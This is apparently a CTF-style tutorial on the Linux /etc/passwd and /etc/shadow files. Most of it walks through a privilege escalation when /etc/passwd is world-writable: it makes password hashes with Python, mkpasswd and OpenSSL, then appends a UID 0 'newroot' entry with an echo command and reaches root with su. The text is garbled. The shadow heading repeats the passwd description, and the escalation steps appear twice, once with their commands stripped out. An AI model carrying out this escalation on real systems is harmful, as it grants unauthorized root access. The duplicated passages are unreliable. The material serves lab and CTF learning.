etc/passwd file :
The /etc/passwd file stores essential information, which is required during login i.e. user account information. It is basically a text file that contains the information about each user or account on a computer running Linux or another Unix-like operating system. The permissions for /etc/passwd are by default set so that it is world readable, that is, so that it can be read by any user on the system. Example :
etc/shadow file :
The /etc/passwd file stores essential information, which is required during login i.e. user account information. It is basically a text file that contains the information about each user or account on a computer running Linux or another Unix-like operating system. The permissions for /etc/passwd are by default set so that it is world readable, that is, so that it can be read by any user on the system. Example :
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
pulse:x:116:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
nm-openvpn:x:117:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
avahi:x:118:125:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
john:x:1000:1000:john,,,:/home/john:/bin/bash
UserName | Password | UserID | GroupID | UserInformation | HomeDirectory | Shell
- UserName is the user's login name, that is the name that a user types in when logging into the system.
- The Password field originally contained an encrypted login password. However, for security reasons, the encrypted passwords are now contained on another file, /etc/shadow, that cannot be read by ordinary users. This field now merely contains the letter x to indicate that a password has been assigned to the user and is required for authentication. If this field is empty, the user can log in without a password.
- UserID is the user's unique numeric identification number, which is used by the system for access control. Zero is reserved for the root account
- GroupID specifies the user's principal group identification number. This is usually the same as the user ID.
- UserInformation is basically comment field. It allows to add extra information about the users such as user's full name, phone number etc.
- HomeDirectory is the full path of the user's home directory.
- Shell is the full path of the default shell for the user.
etc/shadow file :
The actual password data is stored in a file called "/etc/shadow". This doesn't actually contain passwords in plain text, rather it contains hashed password. However this file can be only read/edit bu root users.
Now in some cases the /etc/passwd file is writable to normal users also (Specially in some CTF challenges), so in that case a normal user can gain root access by manually editing these files.
Note: This method only works if /etc/passwd is permitted to read-write for all users. For example :
Preparing new user to append on file :
The root user entry is look like this
Creating Password :
There are lots of method to create hashed password for example :
With Python :
With mkpasswd :
With OpenSSL:
Now try to login with our newly created user.
Now in some cases the /etc/passwd file is writable to normal users also (Specially in some CTF challenges), so in that case a normal user can gain root access by manually editing these files.
Note: This method only works if /etc/passwd is permitted to read-write for all users. For example :
$ ls -al /etc/passwd
-rw-rw-rw- 1 root root 2364 Nov 16 2017 /etc/passwd
Preparing new user to append on file :
The root user entry is look like this
root:x:0:0:root:/root:/bin/bash
Creating Password :
There are lots of method to create hashed password for example :
With Python :
$ python -c 'import crypt; print crypt.crypt("password", "$6$salt")'
$6$salt$3aEJgflnzWuw1O3tr0IYSmhUY0cZ7iBQeBP392T7RXjLP3TKKu3ddIapQaCpbD4p9ioeGaVIjOHaym7HvCuUm0
With mkpasswd :
$ mkpasswd -m SHA-512 password
$6$FXCnL/3ctsXQJ$2PNnFRCTyb0uh/pq5xsDyfqGIJruZmgVoYsTcioET1xK2sO.73P3JyM3W0UGSVm5DA7KxBleRqx8Ldfb/OVx7/
With OpenSSL:
$ openssl passwd -1 -salt hack password123
$1$hack$MLgkAESrYp7kzYz0Ex2fV/
- -1 : md5 based password algorithm (other options are -5 for SHA256 and -6 for SHA512 ),
- -salt : salt key, which is "hack" and password is password123
newroot:$1$hack$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash
$ echo "newroot:\$1\$hack\$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash" >> /etc/passwd
Now try to login with our newly created user.
$ su - newroot
$ whoami
root